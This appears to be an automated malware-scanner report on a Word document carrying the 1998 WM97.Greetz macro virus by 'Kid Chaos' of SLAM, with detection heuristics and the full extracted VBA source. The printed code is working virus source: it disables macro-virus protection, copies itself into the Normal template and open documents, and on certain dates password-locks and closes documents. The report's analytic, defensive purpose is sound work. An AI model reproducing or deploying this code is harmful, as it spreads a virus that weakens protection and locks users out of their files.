MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits characteristics of a legacy WordBasic macro virus, specifically mentioning 'Kid Chaos' and 'SLAM' in the document body and script comments. The VBA macros, including an AutoOpen subroutine, are designed to copy themselves to the active document and the Normal template, indicating a self-propagation mechanism. The presence of 'WordBasic_Macro_Virus' and 'VBA_AutoOpen' heuristics further supports this classification.
Heuristics 5
-
ClamAV: Doc.Trojan.Kid-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Kid-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3229 bytes |
SHA-256: 9596e1ddb92582fc39a0be2ea17e5b9dfebdabec79ec01143375ce11b602cdee |
|||
|
Detection
ClamAV:
Doc.Trojan.Kid-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "KidChaos"
Sub KC()
Dim Temp(3) As String
On Error GoTo Au
Temp(1) = "KidChaos"
Temp(2) = "SLAM"
Temp(3) = "Greetz"
With Application
ScreenUpdating = False
DisplayAlerts = wdAlertsNone
End With
Options.VirusProtection = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
DocInf = False
GloInf = False
For k = 1 To WordBasic.CountMacros(1)
If WordBasic.MacroName$(k, 1) = "SLAM" Then DocInf = 1
Next k
If DocInf = False Then
For z = 1 To 3
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:=Temp(z), _
Object:=wdOrganizerObjectProjectItems
Next z
ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
End If
For k = 1 To WordBasic.CountMacros(0)
If WordBasic.MacroName$(k, 0) = "Greetz" Then GloInf = 1
Next k
If GloInf = False Then
For z = 1 To 3
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:=Temp(z), _
Object:=wdOrganizerObjectProjectItems
Next z
Options.SaveNormalPrompt = False
End If
Application.DisplayAlerts = wdAlertsAll
Au:
End Sub
Sub AutoExec()
'-----X-----S L A M R O Q S !!! -----X-----
End Sub
Attribute VB_Name = "SLAM"
Sub AutoOpen()
' WM97.Greetz dedicated to my brotherz of SLAM VIRUS TEAM!
' (c) April 1998, by Kid Chaos [SLAM]
On Error GoTo seeya
If (Rnd() < 0.4) Then
With Assistant.NewBalloon
.BalloonType = msoBalloonTypeBullets
.Icon = msoIconTip
.Button = msoButtonSetOkCancel
.Heading = "Word97.Greetz" & vbCrLf & "by Kid Chaos [SLAM]"
.Labels(1).Text = " Greetings to SLAM friends:"
.Labels(2).Text = " Virtual Daemon" & vbCrLf & " Aurodreph" _
& vbCrLf & " CyberYoda" & vbCrLf & " Darx Kies" & vbCrLf & _
" Forms" & vbCrLf & " rAiD" & vbCrLf & " Shaitan" & vbCrLf & _
" Stealth Warrior" & vbCrLf & " Trigger" & vbCrLf & " Yesna"
.Show
End With
End If
seeya:
Call KC
End Sub
Sub HelpAbout()
On Error GoTo Ha
If (Day(Now()) > 13) Then
MsgBox "====> (c) 1998 by Kid Chaos <====" & vbCrLf & _
"====> of SLAM Virus Team <====" & vbCrLf & vbCrLf & _
"Hey Bill Gates, do you like other cake" & vbCrLf & _
"on your face? :-D" _
, vbCritical, "About WM97.Greetz... :-)"
End If
Ha:
End Sub
Attribute VB_Name = "Greetz"
Sub FileTemplates()
On Error GoTo Ft
If (Day(Now()) = 13) Then
ActiveDocument.Password = "KidChaos"
Documents.Close SaveChanges:=wdSaveChanges
End If
Ft:
End Sub
Sub ToolsMacro()
On Error GoTo St
If (Day(Now()) = 1) Then
ActiveDocument.Password = "WeRoqs"
Documents.Close SaveChanges:=wdSaveChanges
End If
St:
End Sub
Sub ViewVBcode()
On Error GoTo Vv
If (Day(Now()) = 20) Then
ActiveDocument.Password = "SLAM98"
Documents.Close SaveChanges:=wdSaveChanges
End If
Vv:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.